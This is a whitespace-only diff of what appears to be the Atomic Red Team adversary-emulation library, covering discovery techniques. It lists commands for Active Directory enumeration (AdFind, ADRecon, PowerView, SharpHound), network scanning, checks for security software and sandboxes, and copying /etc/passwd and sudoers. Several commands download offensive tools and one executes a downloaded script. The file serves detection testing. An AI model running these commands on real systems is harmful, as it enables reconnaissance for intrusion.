@@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) - ' +' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 - ' +' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: 
@@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force - ' +' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks - ' +' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite - ' +' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites - ' +' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} - ' +' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) - ' +' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} - ' +' executor: command: 'Invoke-Expression #{adrecon_path} - ' +' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account - ' +' supported_platforms: - windows executor: command: 'net user administrator /domain - ' +' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed - ' +' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} - ' +' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name - ' +' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. - ' +' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. - ' +' - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - ' +' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
@@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * - ' +' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk - ' +' prereq_command: 'WHERE nltest.exe >NUL 2>&1 - ' +' get_prereq_command: 'echo Sorry RSAT must be installed manually - ' +' executor: command: 'nltest /domain_trusts - ' +' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk - ' +' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" - ' +' - description: 'RSAT PowerShell AD admin cmdlets must be installed - ' +' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" - ' +' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system - ' +' supported_platforms: - macos - linux 
@@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file - ' +' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 - ' +' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user - ' +' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username - ' +' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely - ' +' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get install login; exit 1; - ' +' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups - ' +' supported_platforms: - linux - macos 
@@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups - ' +' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery - ' +' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) - ' +' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" - ' +' executor: name: powershell elevation_required: false 
@@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore - ' +' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'wmic.exe group get name - ' +' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group - ' +' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed - ' +' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python - ' +' supported_platforms: - windows input_arguments: 
@@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' executor: command: 'python #(unknown) -i #{host_ip} - ' +' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery - ' +' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus - ' +' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares - ' +' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} - ' +' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare - ' +' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae 
@@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share - ' +' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain - ' +' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: '"Join system to domain" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 - ' +' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: 
@@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. - ' +' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v7 - ' +' executor: command: 'cat /etc/security/pwquality.conf - ' +' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. - ' +' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 - ' +' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from CentOS or RHEL v6 - ' +' executor: command: | cat /etc/pam.d/system-auth 
@@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. - ' +' supported_platforms: - linux executor: command: 'cat /etc/login.defs - ' +' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts - ' +' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. - ' +' supported_platforms: - windows executor: command: 'net accounts /domain - ' +' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. - ' +' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist - ' +' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain - ' +' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} - ' +' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
@@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i - ' +' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a - ' +' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' - ' +' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done - ' +' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: 'if (python --version) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'adidnsdump must be installed and part of PATH - ' +' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} - ' +' get_prereq_command: 'pip3 install adidnsdump - ' +' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} - ' +' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects
@@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt
@@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt
@@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip neighbour show - ' +' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
@@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip route show - ' +' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
@@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'apt-get install iproute2 -y - ' +' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." - ' +' name: sh T1518.001: technique:
@@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' - ' +' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
@@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' - ' +' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 - ' +' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI
@@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - ' +' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
@@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors - ' +' supported_platforms: - macos executor:
@@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor:
@@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor:
@@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system
@@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. - ' +' supported_platforms: - windows executor:
